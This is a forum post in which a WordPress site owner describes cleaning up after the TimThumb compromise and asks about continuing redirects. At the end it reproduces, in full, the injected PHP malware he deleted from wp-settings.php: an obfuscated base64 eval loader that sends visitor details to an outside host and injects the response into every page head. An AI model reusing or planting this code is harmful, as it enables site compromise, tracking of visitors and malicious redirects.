To whoever is lucky enough to read through my problem
I have to say this site has been quite informative! I've digested a few Website security articles and have to say they were exactly what I was looking for. But my problem still persists!
I had a few websites running Wordpress which had certain themes installed using the Timthumb script (used to format images from what I hear). In August their was a nice vulnerability in the script and 1000's of sites got "hacked" or were compromised, including mine
!
So I went threw as many articles as I could and I have decided to seek so friendly forum help.
What I found was some malicious code in the "l10n.js" file (bunch of numbers and what not). I cleaned up the file (basically used a fresh Wordpress download l10n.js file to compare and clean).
I also went through any files that were different in size compared to the default Wordpress install. Anything that was different I opened up and did my best to scan through the code.
In the wp-settings.php file I notice some weird code near the bottom of the file (bunch of letters numbers symbols, wish I had saved it) so I deleted it out. Seems to have done no harm.
All scans come up clean, Google has not flagged the site (only one on my shared hosting sites was flagged and I deleted it because I really didn't need it). 3 sites came up infected with Scuri scan initially but all come up clean now.
The Problem:
What I am noticing is every so often when I visit one of the three sites, I am redirected to Yahoo Associated Content site automatically and sometimes i'm redirected a bunch of times (every half second) to all these different sites.
I don't know where to look for the problem and any advice would be helpful!
Thanks a bunch,
Robb
P.s. I also did a scan with the script on your site...I don't really know what to look for in the results (or what should flag me), any help here would be much appreciated!
Edit: I found the code I deleted from the wp-settings.php file. After reading all those articles, I think I did the right thing.
function counter_wordpress() {$_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTI
zNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1
IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 2);$re = curl_exec($ch);curl_close($ch);echo $re;}add_action('wp_head', 'counter_wordpress');
do_action( 'init' );
